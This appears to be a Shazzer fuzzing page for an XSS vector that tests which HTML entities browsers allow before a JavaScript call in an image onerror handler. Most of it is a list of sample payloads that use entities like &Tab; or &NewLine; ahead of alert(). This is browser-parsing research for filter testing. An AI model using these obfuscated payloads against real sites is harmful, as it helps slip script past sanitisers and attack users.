Entities allowed before function calls

This vector uses Shazzer's new features to check which entities are allowed before a function call using images. The results are a bit inconsistent yet because I currently wait for page load.

Created byhackvertor

Created Jul 2, 2024

Updated May 27, 2025

Detecting browser...

CategoryEntity Parsing

VisibilityPublic

TypeXSS

CharsetUTF-8

$[data1] placeholderhtml_entities

Template used:

<img src=data: onerror="$[data1]log('html($[data1])')">

Sample payloads

<img src=data: onerror="&emsp13;alert('&#38;emsp13;')">

<img src=data: onerror="&emsp14;alert('&#38;emsp14;')">

<img src=data: onerror="&emsp;alert('&#38;emsp;')">

<img src=data: onerror="&ensp;alert('&#38;ensp;')">

<img src=data: onerror="&excl;alert('&#38;excl;')">

<img src=data: onerror="&hairsp;alert('&#38;hairsp;')">

<img src=data: onerror="&MediumSpace;alert('&#38;MediumSpace;')">

<img src=data: onerror="&nbsp;alert('&#38;nbsp;')">

<img src=data: onerror="&NewLine;alert('&#38;NewLine;')">

<img src=data: onerror="&NonBreakingSpace;alert('&#38;NonBreakingSpace;')">

<img src=data: onerror="&numsp;alert('&#38;numsp;')">

<img src=data: onerror="&plus;alert('&#38;plus;')">

<img src=data: onerror="&puncsp;alert('&#38;puncsp;')">

<img src=data: onerror="&semi;alert('&#38;semi;')">

<img src=data: onerror="&Tab;alert('&#38;Tab;')">

<img src=data: onerror="&ThickSpace;alert('&#38;ThickSpace;')">

<img src=data: onerror="&ThinSpace;alert('&#38;ThinSpace;')">

<img src=data: onerror="&thinsp;alert('&#38;thinsp;')">

<img src=data: onerror="&VeryThinSpace;alert('&#38;VeryThinSpace;')">

Entities allowed before function calls

Sample payloads

Fuzz results

Distributed Fuzzing